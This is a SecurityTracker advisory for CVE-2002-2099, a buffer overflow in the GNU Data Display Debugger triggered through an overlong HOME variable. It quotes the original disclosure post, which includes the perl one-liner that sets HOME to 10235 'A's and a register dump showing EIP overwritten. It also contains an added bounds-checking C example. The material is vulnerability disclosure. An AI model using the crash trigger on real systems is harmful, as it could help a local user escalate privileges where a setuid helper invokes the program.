SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   Data Display Debugger (DDD)
Vendors:   [Multiple Authors/Vendors]
Data Display Debugger (DDD) Programming Utility Buffer Overflow May Let Local Users Obtain Elevated Privileges in Certain Situations When Used With Another Helper Binary
SecurityTracker Alert ID:  1003241
SecurityTracker URL:  http://securitytracker.com/id/1003241
CVE Reference:   CVE-2002-2099
Updated:  May 19 2008
Original Entry Date:  Jan 15 2002
Impact:   Execution of arbitrary code via local system, User access via local system

Version(s): 3.3.1 (i686-pc-linux-gnu)
Description:   A buffer overflow was reported in the Data Display Debugger (DDD) programming utility. A local user can execute arbitrary code with the privileges of the DDD process and may be able to obtain elevated privileges if the utility is invoked by a set-user-id (suid) helper application.

It is reported that a buffer overflow can be triggered by setting the HOME environment variable to a large string, as demonstrated below:

sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
sh-2.04$ ddd /usr/bin/evolution

This results in a "File name too long" error, and the saved instruction pointer (EIP) is overwritten with the supplied bytes (0x41414141), indicating that the overlong HOME value overruns a fixed-size buffer used to build a path under the home directory.
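As an added illustration (hypothetical code, not DDD's source and not part of the original report), the following C helper builds a "$HOME/.ddd/themes/" path into a fixed-size buffer with an explicit length check, so an oversized HOME value is rejected instead of overrunning the buffer; `build_theme_dir`, `theme_dir_static`, `probe_home_len` and the 4096-byte buffer size are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper, not DDD's code: fixed buffer size and the
 * sub-directory appended to $HOME. */
#define DIR_BUF_LEN 4096
#define THEME_SUBDIR "/.ddd/themes/"

/* Build "<home>/.ddd/themes/" into out[]. Returns 0 on success, -1 if home is
 * unset/empty or the result (with its NUL) would not fit. The length check runs
 * before any copy: an environment value is attacker-controlled whenever the
 * caller runs with privileges, so it must never be copied unchecked. */
int build_theme_dir(const char *home, char *out, size_t out_len)
{
    if (home == NULL || home[0] == '\0' || out == NULL || out_len == 0)
        return -1;
    if (strlen(home) + strlen(THEME_SUBDIR) + 1 > out_len)
        return -1;                  /* would overflow: refuse rather than truncate */
    int n = snprintf(out, out_len, "%s%s", home, THEME_SUBDIR);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;   /* defence in depth */
}

/* Wrapper using a static DIR_BUF_LEN buffer; returns NULL when rejected. */
const char *theme_dir_static(const char *home)
{
    static char out[DIR_BUF_LEN];
    return build_theme_dir(home, out, sizeof out) == 0 ? out : NULL;
}

/* Probe with a constructed HOME of n 'A' characters (the report used 10235);
 * returns 0 if accepted, -1 if rejected, -2 on allocation failure. */
int probe_home_len(size_t n)
{
    char *home = malloc(n + 1);
    if (home == NULL)
        return -2;
    memset(home, 'A', n);
    home[n] = '\0';
    int rc = theme_dir_static(home) != NULL ? 0 : -1;
    free(home);
    return rc;
}

int main(void)
{
    printf("HOME=/home/user -> %s\n", theme_dir_static("/home/user"));
    printf("HOME of 10235 'A's -> rc %d\n", probe_home_len(10235));
    return 0;
}
```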

Impact:   A local user can execute arbitrary code on the host. If the utility is invoked by a helper binary that is set-user-id (suid) or set-group-id (sgid), a local user could obtain that helper's elevated privileges on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.gnu.org/software/ddd/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on Red Hat 7.1

Message History:   None.


Source Message Contents

Subject:  ddd smashed

Werd...
========================================================================
Program  : ddd
OS       : Linux
DISTRO   : RedHat 7.1
Issue    : 0x41414141 (no core tho)
Home Page: http://www.gnu.org/software/ddd/
suid     : No
sgid     : No
Issue    : ddd may be called by an suid helper binary and could be
           exploited to gain local root access.

GNU DDD, the Data Display Debugger, is a GUI to command-line debuggers
like GDB, DBX, JDB, XDB, Ladebug, WDB, the Perl debugger, or the Python
debugger. It provides a graphical data display where complex data
structures can be explored incrementally and interactively.
========================================================================

Normally I use gdb to debug cores, but today I decided to try ddd and my
efforts failed.  When I set $HOME in my test account to 10235 A's
and tried to run ddd like this (I found an evolution core that will be
explained in my next post):


sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
sh-2.04$ ddd /usr/bin/evolution

I get a bunch of A's that spew to my console and then some memory access
errors as seen below:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... blah blah...
/.ddd/themes/" failed: File name too long
/tmp/dddNhatCp:3: Error in sourced command file:
Cannot access memory at address 0x41414141
<ctrl-c>

So... in light of this... I decided to use gdb to debug ddd, which uses
gdb.. heh...


Here is a dump of the registers...


eax            0x8572ec4        139931332
ecx            0x0      0
edx            0xbfffbc20       -1073759200
ebx            0x41414141       1094795585
esp            0xbfffbc20       0xbfffbc20
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x120    288
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400bf242       1074524738
foseg          0x2b     43
fooff          0xbfffac86       -1073763194
fop            0x6a     106


smashed ;o)


-- 

-l0rt-

Secure Network Operations
Strategic Reconnaissance Team
Team Key ID: ACFCBD01
l0rt Key ID: 47BF3F87
------------------------------------------
"That secret you've been guarding, isn't."



Copyright 2021, SecurityGlobal.net LLC